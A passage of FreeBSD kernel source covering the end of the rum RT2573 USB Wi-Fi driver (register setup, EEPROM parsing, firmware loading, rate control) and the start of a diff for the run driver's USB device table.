rum_bbp_write(sc, 3, bbp3); if (bbp94 != RT2573_BBPR94_DEFAULT) rum_bbp_write(sc, 94, bbp94); /* give the chip some extra time to do the switchover */ rum_pause(sc, hz / 100); } /* * Enable TSF synchronization and tell h/w to start sending beacons for IBSS * and HostAP operating modes. 
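 * TXRX_CSR9 holds the beacon interval in 1/16 ms units (hence the
 * "* 16" below, with one TU treated as roughly 1 ms), the TSF mode
 * (1 in STA mode, 2 plus beacon generation otherwise) and the TBTT
 * enable.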
*/ static void rum_enable_tsf_sync(struct rum_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); uint32_t tmp; if (vap->iv_opmode != IEEE80211_M_STA) { /* * Change default 16ms TBTT adjustment to 8ms. * Must be done before enabling beacon generation. */ rum_write(sc, RT2573_TXRX_CSR10, 1 << 12 | 8); } tmp = rum_read(sc, RT2573_TXRX_CSR9) & 0xff000000; /* set beacon interval (in 1/16ms unit) */ tmp |= vap->iv_bss->ni_intval * 16; tmp |= RT2573_TSF_TICKING | RT2573_ENABLE_TBTT; if (vap->iv_opmode == IEEE80211_M_STA) tmp |= RT2573_TSF_MODE(1); else tmp |= RT2573_TSF_MODE(2) | RT2573_GENERATE_BEACON; rum_write(sc, RT2573_TXRX_CSR9, tmp); } static void rum_enable_tsf(struct rum_softc *sc) { rum_write(sc, RT2573_TXRX_CSR9, (rum_read(sc, RT2573_TXRX_CSR9) & 0xff000000) | RT2573_TSF_TICKING | RT2573_TSF_MODE(2)); } static void rum_update_slot(struct ifnet *ifp) { struct rum_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; uint8_t slottime; uint32_t tmp; slottime = (ic->ic_flags & IEEE80211_F_SHSLOT) ? 9 : 20; tmp = rum_read(sc, RT2573_MAC_CSR9); tmp = (tmp & ~0xff) | slottime; rum_write(sc, RT2573_MAC_CSR9, tmp); DPRINTF("setting slot time to %uus\n", slottime); } static void rum_set_bssid(struct rum_softc *sc, const uint8_t *bssid) { uint32_t tmp; tmp = bssid[0] | bssid[1] << 8 | bssid[2] << 16 | bssid[3] << 24; rum_write(sc, RT2573_MAC_CSR4, tmp); tmp = bssid[4] | bssid[5] << 8 | RT2573_ONE_BSSID << 16; rum_write(sc, RT2573_MAC_CSR5, tmp); } static void rum_set_macaddr(struct rum_softc *sc, const uint8_t *addr) { uint32_t tmp; tmp = addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24; rum_write(sc, RT2573_MAC_CSR2, tmp); tmp = addr[4] | addr[5] << 8 | 0xff << 16; rum_write(sc, RT2573_MAC_CSR3, tmp); } static void rum_setpromisc(struct rum_softc *sc) { struct ifnet *ifp = sc->sc_ifp; uint32_t tmp; tmp = rum_read(sc, RT2573_TXRX_CSR0); tmp &= ~RT2573_DROP_NOT_TO_ME; if (!(ifp->if_flags & IFF_PROMISC)) tmp |= RT2573_DROP_NOT_TO_ME; rum_write(sc, RT2573_TXRX_CSR0, tmp); DPRINTF("%s promiscuous mode\n", (ifp->if_flags & IFF_PROMISC) ? 
"entering" : "leaving"); } static void rum_update_promisc(struct ifnet *ifp) { struct rum_softc *sc = ifp->if_softc; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; RUM_LOCK(sc); rum_setpromisc(sc); RUM_UNLOCK(sc); } static void rum_update_mcast(struct ifnet *ifp) { static int warning_printed; if (warning_printed == 0) { if_printf(ifp, "need to implement %s\n", __func__); warning_printed = 1; } } static const char * rum_get_rf(int rev) { switch (rev) { case RT2573_RF_2527: return "RT2527 (MIMO XR)"; case RT2573_RF_2528: return "RT2528"; case RT2573_RF_5225: return "RT5225 (MIMO XR)"; case RT2573_RF_5226: return "RT5226"; default: return "unknown"; } } static void rum_read_eeprom(struct rum_softc *sc) { uint16_t val; #ifdef RUM_DEBUG int i; #endif /* read MAC address */ rum_eeprom_read(sc, RT2573_EEPROM_ADDRESS, sc->sc_bssid, 6); rum_eeprom_read(sc, RT2573_EEPROM_ANTENNA, &val, 2); val = le16toh(val); sc->rf_rev = (val >> 11) & 0x1f; sc->hw_radio = (val >> 10) & 0x1; sc->rx_ant = (val >> 4) & 0x3; sc->tx_ant = (val >> 2) & 0x3; sc->nb_ant = val & 0x3; DPRINTF("RF revision=%d\n", sc->rf_rev); rum_eeprom_read(sc, RT2573_EEPROM_CONFIG2, &val, 2); val = le16toh(val); sc->ext_5ghz_lna = (val >> 6) & 0x1; sc->ext_2ghz_lna = (val >> 4) & 0x1; DPRINTF("External 2GHz LNA=%d\nExternal 5GHz LNA=%d\n", sc->ext_2ghz_lna, sc->ext_5ghz_lna); rum_eeprom_read(sc, RT2573_EEPROM_RSSI_2GHZ_OFFSET, &val, 2); val = le16toh(val); if ((val & 0xff) != 0xff) sc->rssi_2ghz_corr = (int8_t)(val & 0xff); /* signed */ /* Only [-10, 10] is valid */ if (sc->rssi_2ghz_corr < -10 || sc->rssi_2ghz_corr > 10) sc->rssi_2ghz_corr = 0; rum_eeprom_read(sc, RT2573_EEPROM_RSSI_5GHZ_OFFSET, &val, 2); val = le16toh(val); if ((val & 0xff) != 0xff) sc->rssi_5ghz_corr = (int8_t)(val & 0xff); /* signed */ /* Only [-10, 10] is valid */ if (sc->rssi_5ghz_corr < -10 || sc->rssi_5ghz_corr > 10) sc->rssi_5ghz_corr = 0; if (sc->ext_2ghz_lna) sc->rssi_2ghz_corr -= 14; if (sc->ext_5ghz_lna) sc->rssi_5ghz_corr -= 14; DPRINTF("RSSI 2GHz corr=%d\nRSSI 5GHz corr=%d\n", sc->rssi_2ghz_corr, sc->rssi_5ghz_corr); rum_eeprom_read(sc, RT2573_EEPROM_FREQ_OFFSET, &val, 2); val = le16toh(val); if ((val & 0xff) != 0xff) sc->rffreq = val & 0xff; DPRINTF("RF freq=%d\n", sc->rffreq); /* read Tx power for all a/b/g channels */ rum_eeprom_read(sc, RT2573_EEPROM_TXPOWER, sc->txpow, 14); /* XXX default Tx power for 802.11a channels */ memset(sc->txpow + 14, 24, sizeof (sc->txpow) - 14); #ifdef RUM_DEBUG for (i = 0; i < 14; i++) DPRINTF("Channel=%d Tx power=%d\n", i + 1, sc->txpow[i]); #endif /* read default values for BBP registers */ rum_eeprom_read(sc, RT2573_EEPROM_BBP_BASE, sc->bbp_prom, 2 * 16); #ifdef RUM_DEBUG for (i = 0; i < 14; i++) { if (sc->bbp_prom[i].reg == 0 || sc->bbp_prom[i].reg == 0xff) continue; DPRINTF("BBP R%d=%02x\n", sc->bbp_prom[i].reg, sc->bbp_prom[i].val); } #endif } static int rum_bbp_init(struct rum_softc *sc) { int i, ntries; /* wait for BBP to be ready */ for (ntries = 0; ntries < 100; ntries++) { const uint8_t val = rum_bbp_read(sc, 0); if (val != 0 && val != 0xff) break; if (rum_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for BBP\n"); return EIO; } /* initialize BBP registers to default values */ for (i = 0; i < N(rum_def_bbp); i++) rum_bbp_write(sc, rum_def_bbp[i].reg, rum_def_bbp[i].val); /* write vendor-specific BBP values (from EEPROM) */ for (i = 0; i < 16; i++) { if (sc->bbp_prom[i].reg == 0 || sc->bbp_prom[i].reg == 0xff) continue; rum_bbp_write(sc, sc->bbp_prom[i].reg, 
sc->bbp_prom[i].val); } return 0; } static void rum_init_locked(struct rum_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; usb_error_t error; int i, ntries; RUM_LOCK_ASSERT(sc, MA_OWNED); rum_stop(sc); /* initialize MAC registers to default values */ for (i = 0; i < N(rum_def_mac); i++) rum_write(sc, rum_def_mac[i].reg, rum_def_mac[i].val); /* set host ready */ rum_write(sc, RT2573_MAC_CSR1, 3); rum_write(sc, RT2573_MAC_CSR1, 0); /* wait for BBP/RF to wakeup */ for (ntries = 0; ntries < 100; ntries++) { if (rum_read(sc, RT2573_MAC_CSR12) & 8) break; rum_write(sc, RT2573_MAC_CSR12, 4); /* force wakeup */ if (rum_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for BBP/RF to wakeup\n"); goto fail; } if ((error = rum_bbp_init(sc)) != 0) goto fail; /* select default channel */ rum_select_band(sc, ic->ic_curchan); rum_select_antenna(sc); rum_set_chan(sc, ic->ic_curchan); /* clear STA registers */ rum_read_multi(sc, RT2573_STA_CSR0, sc->sta, sizeof sc->sta); rum_set_macaddr(sc, IF_LLADDR(ifp)); /* initialize ASIC */ rum_write(sc, RT2573_MAC_CSR1, 4); /* * Allocate Tx and Rx xfer queues. */ rum_setup_tx_list(sc); /* update Rx filter */ tmp = rum_read(sc, RT2573_TXRX_CSR0) & 0xffff; tmp |= RT2573_DROP_PHY_ERROR | RT2573_DROP_CRC_ERROR; if (ic->ic_opmode != IEEE80211_M_MONITOR) { tmp |= RT2573_DROP_CTL | RT2573_DROP_VER_ERROR | RT2573_DROP_ACKCTS; if (ic->ic_opmode != IEEE80211_M_HOSTAP) tmp |= RT2573_DROP_TODS; if (!(ifp->if_flags & IFF_PROMISC)) tmp |= RT2573_DROP_NOT_TO_ME; } rum_write(sc, RT2573_TXRX_CSR0, tmp); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; usbd_xfer_set_stall(sc->sc_xfer[RUM_BULK_WR]); usbd_transfer_start(sc->sc_xfer[RUM_BULK_RD]); return; fail: rum_stop(sc); #undef N } static void rum_init(void *priv) { struct rum_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; RUM_LOCK(sc); rum_init_locked(sc); RUM_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } static void rum_stop(struct rum_softc *sc) { struct ifnet *ifp = sc->sc_ifp; uint32_t tmp; RUM_LOCK_ASSERT(sc, MA_OWNED); ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); RUM_UNLOCK(sc); /* * Drain the USB transfers, if not already drained: */ usbd_transfer_drain(sc->sc_xfer[RUM_BULK_WR]); usbd_transfer_drain(sc->sc_xfer[RUM_BULK_RD]); RUM_LOCK(sc); rum_unsetup_tx_list(sc); /* disable Rx */ tmp = rum_read(sc, RT2573_TXRX_CSR0); rum_write(sc, RT2573_TXRX_CSR0, tmp | RT2573_DISABLE_RX); /* reset ASIC */ rum_write(sc, RT2573_MAC_CSR1, 3); rum_write(sc, RT2573_MAC_CSR1, 0); } static void rum_load_microcode(struct rum_softc *sc, const uint8_t *ucode, size_t size) { struct usb_device_request req; uint16_t reg = RT2573_MCU_CODE_BASE; usb_error_t err; /* copy firmware image into NIC */ for (; size >= 4; reg += 4, ucode += 4, size -= 4) { err = rum_write(sc, reg, UGETDW(ucode)); if (err) { /* firmware already loaded ? */ device_printf(sc->sc_dev, "Firmware load " "failure! 
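/*
 * Illustrative sketch (an assumption, not the driver's code): the firmware
 * copy loop in rum_load_microcode() pushes the image four bytes at a time,
 * and UGETDW is taken here to assemble a little-endian 32-bit word from the
 * byte stream, e.g. the bytes 10 02 28 10 become 0x10280210.
 */
#include <stdint.h>

static uint32_t
get_le32(const uint8_t *p)
{
        return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
            (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}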
(ignored)\n"); break; } } req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RT2573_MCU_CNTL; USETW(req.wValue, RT2573_MCU_RUN); USETW(req.wIndex, 0); USETW(req.wLength, 0); err = rum_do_request(sc, &req, NULL); if (err != 0) { device_printf(sc->sc_dev, "could not run firmware: %s\n", usbd_errstr(err)); } /* give the chip some time to boot */ rum_pause(sc, hz / 8); } static void rum_prepare_beacon(struct rum_softc *sc, struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; const struct ieee80211_txparam *tp; struct rum_tx_desc desc; struct mbuf *m0; if (vap->iv_bss->ni_chan == IEEE80211_CHAN_ANYC) return; if (ic->ic_bsschan == IEEE80211_CHAN_ANYC) return; m0 = ieee80211_beacon_alloc(vap->iv_bss, &RUM_VAP(vap)->bo); if (m0 == NULL) return; tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_bsschan)]; rum_setup_tx_desc(sc, &desc, RT2573_TX_TIMESTAMP, RT2573_TX_HWSEQ, m0->m_pkthdr.len, tp->mgmtrate); /* copy the first 24 bytes of Tx descriptor into NIC memory */ rum_write_multi(sc, RT2573_HW_BEACON_BASE0, (uint8_t *)&desc, 24); /* copy beacon header and payload into NIC memory */ rum_write_multi(sc, RT2573_HW_BEACON_BASE0 + 24, mtod(m0, uint8_t *), m0->m_pkthdr.len); m_freem(m0); } static int rum_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ifnet *ifp = ni->ni_ic->ic_ifp; struct rum_softc *sc = ifp->if_softc; RUM_LOCK(sc); /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { RUM_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return ENETDOWN; } if (sc->tx_nfree < RUM_TX_MINFREE) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; RUM_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return EIO; } ifp->if_opackets++; if (params == NULL) { /* * Legacy path; interpret frame contents to decide * precisely how to send the frame. */ if (rum_tx_mgt(sc, m, ni) != 0) goto bad; } else { /* * Caller supplied explicit parameters to use in * sending the frame. 
*/ if (rum_tx_raw(sc, m, ni, params) != 0) goto bad; } RUM_UNLOCK(sc); return 0; bad: ifp->if_oerrors++; RUM_UNLOCK(sc); ieee80211_free_node(ni); return EIO; } static void rum_ratectl_start(struct rum_softc *sc, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct rum_vap *rvp = RUM_VAP(vap); /* clear statistic registers (STA_CSR0 to STA_CSR5) */ rum_read_multi(sc, RT2573_STA_CSR0, sc->sta, sizeof sc->sta); usb_callout_reset(&rvp->ratectl_ch, hz, rum_ratectl_timeout, rvp); } static void rum_ratectl_timeout(void *arg) { struct rum_vap *rvp = arg; struct ieee80211vap *vap = &rvp->vap; struct ieee80211com *ic = vap->iv_ic; ieee80211_runtask(ic, &rvp->ratectl_task); } static void rum_ratectl_task(void *arg, int pending) { struct rum_vap *rvp = arg; struct ieee80211vap *vap = &rvp->vap; struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; struct rum_softc *sc = ifp->if_softc; struct ieee80211_node *ni; int ok, fail; int sum, retrycnt; RUM_LOCK(sc); /* read and clear statistic registers (STA_CSR0 to STA_CSR10) */ rum_read_multi(sc, RT2573_STA_CSR0, sc->sta, sizeof(sc->sta)); ok = (le32toh(sc->sta[4]) >> 16) + /* TX ok w/o retry */ (le32toh(sc->sta[5]) & 0xffff); /* TX ok w/ retry */ fail = (le32toh(sc->sta[5]) >> 16); /* TX retry-fail count */ sum = ok+fail; retrycnt = (le32toh(sc->sta[5]) & 0xffff) + fail; ni = ieee80211_ref_node(vap->iv_bss); ieee80211_ratectl_tx_update(vap, ni, &sum, &ok, &retrycnt); (void) ieee80211_ratectl_rate(ni, NULL, 0); ieee80211_free_node(ni); ifp->if_oerrors += fail; /* count TX retry-fail as Tx errors */ usb_callout_reset(&rvp->ratectl_ch, hz, rum_ratectl_timeout, rvp); RUM_UNLOCK(sc); } static void rum_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rum_softc *sc = ifp->if_softc; uint32_t tmp; RUM_LOCK(sc); /* abort TSF synchronization */ tmp = rum_read(sc, RT2573_TXRX_CSR9); rum_write(sc, RT2573_TXRX_CSR9, tmp & ~0x00ffffff); rum_set_bssid(sc, ifp->if_broadcastaddr); RUM_UNLOCK(sc); } static void rum_scan_end(struct ieee80211com *ic) { struct rum_softc *sc = ic->ic_ifp->if_softc; RUM_LOCK(sc); rum_enable_tsf_sync(sc); rum_set_bssid(sc, sc->sc_bssid); RUM_UNLOCK(sc); } static void rum_set_channel(struct ieee80211com *ic) { struct rum_softc *sc = ic->ic_ifp->if_softc; RUM_LOCK(sc); rum_set_chan(sc, ic->ic_curchan); RUM_UNLOCK(sc); } static int rum_get_rssi(struct rum_softc *sc, uint8_t raw) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int lna, agc, rssi; lna = (raw >> 5) & 0x3; agc = raw & 0x1f; if (lna == 0) { /* * No RSSI mapping * * NB: Since RSSI is relative to noise floor, -1 is * adequate for caller to know error happened. 
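/*
 * Illustrative sketch of the STA_CSR accounting done by rum_ratectl_task()
 * above (the assumed field layout follows that code: the high half of
 * sta[4] counts no-retry successes, sta[5] packs retried successes in its
 * low half and retry failures in its high half).
 */
#include <stdint.h>

struct txstats { unsigned ok, fail, retries; };

static struct txstats
decode_sta_counters(uint32_t sta4, uint32_t sta5)       /* host byte order */
{
        struct txstats s;
        unsigned ok_no_retry = sta4 >> 16;
        unsigned ok_retry    = sta5 & 0xffff;

        s.fail    = sta5 >> 16;
        s.ok      = ok_no_retry + ok_retry;
        s.retries = ok_retry + s.fail;  /* frames needing at least one retry */
        return s;
}
/* e.g. sta4=0x00640000, sta5=0x0002000a -> ok=110, fail=2, retries=12 */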
*/ return -1; } rssi = (2 * agc) - RT2573_NOISE_FLOOR; if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { rssi += sc->rssi_2ghz_corr; if (lna == 1) rssi -= 64; else if (lna == 2) rssi -= 74; else if (lna == 3) rssi -= 90; } else { rssi += sc->rssi_5ghz_corr; if (!sc->ext_5ghz_lna && lna != 1) rssi += 4; if (lna == 1) rssi -= 64; else if (lna == 2) rssi -= 86; else if (lna == 3) rssi -= 100; } return rssi; } static int rum_pause(struct rum_softc *sc, int timeout) { usb_pause_mtx(&sc->sc_mtx, timeout); return (0); } static device_method_t rum_methods[] = { /* Device interface */ DEVMETHOD(device_probe, rum_match), DEVMETHOD(device_attach, rum_attach), DEVMETHOD(device_detach, rum_detach), DEVMETHOD_END }; static driver_t rum_driver = { .name = "rum", .methods = rum_methods, .size = sizeof(struct rum_softc), }; static devclass_t rum_devclass; DRIVER_MODULE(rum, uhub, rum_driver, rum_devclass, NULL, 0); MODULE_DEPEND(rum, wlan, 1, 1, 1); MODULE_DEPEND(rum, usb, 1, 1, 1); MODULE_VERSION(rum, 1); diff --git a/sys/dev/usb/wlan/if_run.c b/sys/dev/usb/wlan/if_run.c index 2ced8433c8e3..38b2ae382d23 100644 --- a/sys/dev/usb/wlan/if_run.c +++ b/sys/dev/usb/wlan/if_run.c @@ -1,6302 +1,6302 @@ /*- * Copyright (c) 2008,2010 Damien Bergamini * ported to FreeBSD by Akinori Furukoshi * USB Consulting, Hans Petter Selasky * Copyright (c) 2013-2014 Kevin Lo * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include __FBSDID("$FreeBSD$"); /*- * Ralink Technology RT2700U/RT2800U/RT3000U/RT3900E chipset driver. * http://www.ralinktech.com/ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "usbdevs.h" #define USB_DEBUG_VAR run_debug #include #include #include #include #ifdef USB_DEBUG #define RUN_DEBUG #endif #ifdef RUN_DEBUG int run_debug = 0; static SYSCTL_NODE(_hw_usb, OID_AUTO, run, CTLFLAG_RW, 0, "USB run"); SYSCTL_INT(_hw_usb_run, OID_AUTO, debug, CTLFLAG_RW, &run_debug, 0, "run debug level"); #endif #define IEEE80211_HAS_ADDR4(wh) \ (((wh)->i_fc[1] & IEEE80211_FC1_DIR_MASK) == IEEE80211_FC1_DIR_DSTODS) /* * Because of LOR in run_key_delete(), use atomic instead. * '& RUN_CMDQ_MASQ' is to loop cmdq[]. 
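/*
 * Illustrative sketch of the mapping performed by rum_get_rssi() above: the
 * raw byte packs an LNA selector in bits 5-6 and a 5-bit AGC value, and the
 * result is reported relative to the chip's noise floor.  The noise-floor
 * constant is kept symbolic here and only the 2GHz branch is shown; the
 * driver applies additional corrections on 5GHz.
 */
#include <stdint.h>

static int
rssi_2ghz_sketch(uint8_t raw, int noise_floor, int corr_2ghz)
{
        int lna = (raw >> 5) & 0x3;
        int agc = raw & 0x1f;
        int rssi;

        if (lna == 0)
                return -1;              /* no usable mapping */
        rssi = 2 * agc - noise_floor + corr_2ghz;
        if (lna == 1)
                rssi -= 64;
        else if (lna == 2)
                rssi -= 74;
        else                            /* lna == 3 */
                rssi -= 90;
        return rssi;
}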
*/ #define RUN_CMDQ_GET(c) (atomic_fetchadd_32((c), 1) & RUN_CMDQ_MASQ) static const STRUCT_USB_HOST_ID run_devs[] = { #define RUN_DEV(v,p) { USB_VP(USB_VENDOR_##v, USB_PRODUCT_##v##_##p) } #define RUN_DEV_EJECT(v,p) \ { USB_VPI(USB_VENDOR_##v, USB_PRODUCT_##v##_##p, 0) } RUN_DEV(ABOCOM, RT2770), RUN_DEV(ABOCOM, RT2870), RUN_DEV(ABOCOM, RT3070), RUN_DEV(ABOCOM, RT3071), RUN_DEV(ABOCOM, RT3072), RUN_DEV(ABOCOM2, RT2870_1), RUN_DEV(ACCTON, RT2770), RUN_DEV(ACCTON, RT2870_1), RUN_DEV(ACCTON, RT2870_2), RUN_DEV(ACCTON, RT2870_3), RUN_DEV(ACCTON, RT2870_4), RUN_DEV(ACCTON, RT2870_5), RUN_DEV(ACCTON, RT3070), RUN_DEV(ACCTON, RT3070_1), RUN_DEV(ACCTON, RT3070_2), RUN_DEV(ACCTON, RT3070_3), RUN_DEV(ACCTON, RT3070_4), RUN_DEV(ACCTON, RT3070_5), RUN_DEV(AIRTIES, RT3070), RUN_DEV(ALLWIN, RT2070), RUN_DEV(ALLWIN, RT2770), RUN_DEV(ALLWIN, RT2870), RUN_DEV(ALLWIN, RT3070), RUN_DEV(ALLWIN, RT3071), RUN_DEV(ALLWIN, RT3072), RUN_DEV(ALLWIN, RT3572), RUN_DEV(AMIGO, RT2870_1), RUN_DEV(AMIGO, RT2870_2), RUN_DEV(AMIT, CGWLUSB2GNR), RUN_DEV(AMIT, RT2870_1), RUN_DEV(AMIT2, RT2870), RUN_DEV(ASUS, RT2870_1), RUN_DEV(ASUS, RT2870_2), RUN_DEV(ASUS, RT2870_3), RUN_DEV(ASUS, RT2870_4), RUN_DEV(ASUS, RT2870_5), RUN_DEV(ASUS, USBN13), RUN_DEV(ASUS, RT3070_1), RUN_DEV(ASUS, USBN66), RUN_DEV(ASUS, USB_N53), RUN_DEV(ASUS2, USBN11), RUN_DEV(AZUREWAVE, RT2870_1), RUN_DEV(AZUREWAVE, RT2870_2), RUN_DEV(AZUREWAVE, RT3070_1), RUN_DEV(AZUREWAVE, RT3070_2), RUN_DEV(AZUREWAVE, RT3070_3), RUN_DEV(BELKIN, F9L1103), RUN_DEV(BELKIN, F5D8053V3), RUN_DEV(BELKIN, F5D8055), RUN_DEV(BELKIN, F5D8055V2), RUN_DEV(BELKIN, F6D4050V1), RUN_DEV(BELKIN, F6D4050V2), RUN_DEV(BELKIN, RT2870_1), RUN_DEV(BELKIN, RT2870_2), RUN_DEV(CISCOLINKSYS, AE1000), RUN_DEV(CISCOLINKSYS2, RT3070), RUN_DEV(CISCOLINKSYS3, RT3070), RUN_DEV(CONCEPTRONIC2, RT2870_1), RUN_DEV(CONCEPTRONIC2, RT2870_2), RUN_DEV(CONCEPTRONIC2, RT2870_3), RUN_DEV(CONCEPTRONIC2, RT2870_4), RUN_DEV(CONCEPTRONIC2, RT2870_5), RUN_DEV(CONCEPTRONIC2, RT2870_6), RUN_DEV(CONCEPTRONIC2, RT2870_7), RUN_DEV(CONCEPTRONIC2, RT2870_8), RUN_DEV(CONCEPTRONIC2, RT3070_1), RUN_DEV(CONCEPTRONIC2, RT3070_2), RUN_DEV(CONCEPTRONIC2, VIGORN61), RUN_DEV(COREGA, CGWLUSB300GNM), RUN_DEV(COREGA, RT2870_1), RUN_DEV(COREGA, RT2870_2), RUN_DEV(COREGA, RT2870_3), RUN_DEV(COREGA, RT3070), RUN_DEV(CYBERTAN, RT2870), RUN_DEV(DLINK, RT2870), RUN_DEV(DLINK, RT3072), RUN_DEV(DLINK, DWA127), RUN_DEV(DLINK, DWA140B3), RUN_DEV(DLINK, DWA160B2), RUN_DEV(DLINK, DWA162), RUN_DEV(DLINK2, DWA130), RUN_DEV(DLINK2, RT2870_1), RUN_DEV(DLINK2, RT2870_2), RUN_DEV(DLINK2, RT3070_1), RUN_DEV(DLINK2, RT3070_2), RUN_DEV(DLINK2, RT3070_3), RUN_DEV(DLINK2, RT3070_4), RUN_DEV(DLINK2, RT3070_5), RUN_DEV(DLINK2, RT3072), RUN_DEV(DLINK2, RT3072_1), RUN_DEV(EDIMAX, EW7717), RUN_DEV(EDIMAX, EW7718), RUN_DEV(EDIMAX, EW7733UND), RUN_DEV(EDIMAX, RT2870_1), RUN_DEV(ENCORE, RT3070_1), RUN_DEV(ENCORE, RT3070_2), RUN_DEV(ENCORE, RT3070_3), RUN_DEV(GIGABYTE, GNWB31N), RUN_DEV(GIGABYTE, GNWB32L), RUN_DEV(GIGABYTE, RT2870_1), RUN_DEV(GIGASET, RT3070_1), RUN_DEV(GIGASET, RT3070_2), RUN_DEV(GUILLEMOT, HWNU300), RUN_DEV(HAWKING, HWUN2), RUN_DEV(HAWKING, RT2870_1), RUN_DEV(HAWKING, RT2870_2), RUN_DEV(HAWKING, RT3070), RUN_DEV(IODATA, RT3072_1), RUN_DEV(IODATA, RT3072_2), RUN_DEV(IODATA, RT3072_3), RUN_DEV(IODATA, RT3072_4), RUN_DEV(LINKSYS4, RT3070), RUN_DEV(LINKSYS4, WUSB100), RUN_DEV(LINKSYS4, WUSB54GCV3), RUN_DEV(LINKSYS4, WUSB600N), RUN_DEV(LINKSYS4, WUSB600NV2), RUN_DEV(LOGITEC, RT2870_1), RUN_DEV(LOGITEC, RT2870_2), RUN_DEV(LOGITEC, RT2870_3), RUN_DEV(LOGITEC, 
LANW300NU2), RUN_DEV(LOGITEC, LANW150NU2), RUN_DEV(LOGITEC, LANW300NU2S), RUN_DEV(MELCO, RT2870_1), RUN_DEV(MELCO, RT2870_2), RUN_DEV(MELCO, WLIUCAG300N), RUN_DEV(MELCO, WLIUCG300N), RUN_DEV(MELCO, WLIUCG301N), RUN_DEV(MELCO, WLIUCGN), RUN_DEV(MELCO, WLIUCGNM), RUN_DEV(MELCO, WLIUCGNM2), RUN_DEV(MOTOROLA4, RT2770), RUN_DEV(MOTOROLA4, RT3070), RUN_DEV(MSI, RT3070_1), RUN_DEV(MSI, RT3070_2), RUN_DEV(MSI, RT3070_3), RUN_DEV(MSI, RT3070_4), RUN_DEV(MSI, RT3070_5), RUN_DEV(MSI, RT3070_6), RUN_DEV(MSI, RT3070_7), RUN_DEV(MSI, RT3070_8), RUN_DEV(MSI, RT3070_9), RUN_DEV(MSI, RT3070_10), RUN_DEV(MSI, RT3070_11), RUN_DEV(OVISLINK, RT3072), RUN_DEV(PARA, RT3070), RUN_DEV(PEGATRON, RT2870), RUN_DEV(PEGATRON, RT3070), RUN_DEV(PEGATRON, RT3070_2), RUN_DEV(PEGATRON, RT3070_3), RUN_DEV(PHILIPS, RT2870), RUN_DEV(PLANEX2, GWUS300MINIS), RUN_DEV(PLANEX2, GWUSMICRON), RUN_DEV(PLANEX2, RT2870), RUN_DEV(PLANEX2, RT3070), RUN_DEV(QCOM, RT2870), RUN_DEV(QUANTA, RT3070), RUN_DEV(RALINK, RT2070), RUN_DEV(RALINK, RT2770), RUN_DEV(RALINK, RT2870), RUN_DEV(RALINK, RT3070), RUN_DEV(RALINK, RT3071), RUN_DEV(RALINK, RT3072), RUN_DEV(RALINK, RT3370), RUN_DEV(RALINK, RT3572), RUN_DEV(RALINK, RT3573), RUN_DEV(RALINK, RT5370), RUN_DEV(RALINK, RT5572), RUN_DEV(RALINK, RT8070), RUN_DEV(SAMSUNG, WIS09ABGN), RUN_DEV(SAMSUNG2, RT2870_1), RUN_DEV(SENAO, RT2870_1), RUN_DEV(SENAO, RT2870_2), RUN_DEV(SENAO, RT2870_3), RUN_DEV(SENAO, RT2870_4), RUN_DEV(SENAO, RT3070), RUN_DEV(SENAO, RT3071), RUN_DEV(SENAO, RT3072_1), RUN_DEV(SENAO, RT3072_2), RUN_DEV(SENAO, RT3072_3), RUN_DEV(SENAO, RT3072_4), RUN_DEV(SENAO, RT3072_5), RUN_DEV(SITECOMEU, RT2770), RUN_DEV(SITECOMEU, RT2870_1), RUN_DEV(SITECOMEU, RT2870_2), RUN_DEV(SITECOMEU, RT2870_3), RUN_DEV(SITECOMEU, RT2870_4), RUN_DEV(SITECOMEU, RT3070), 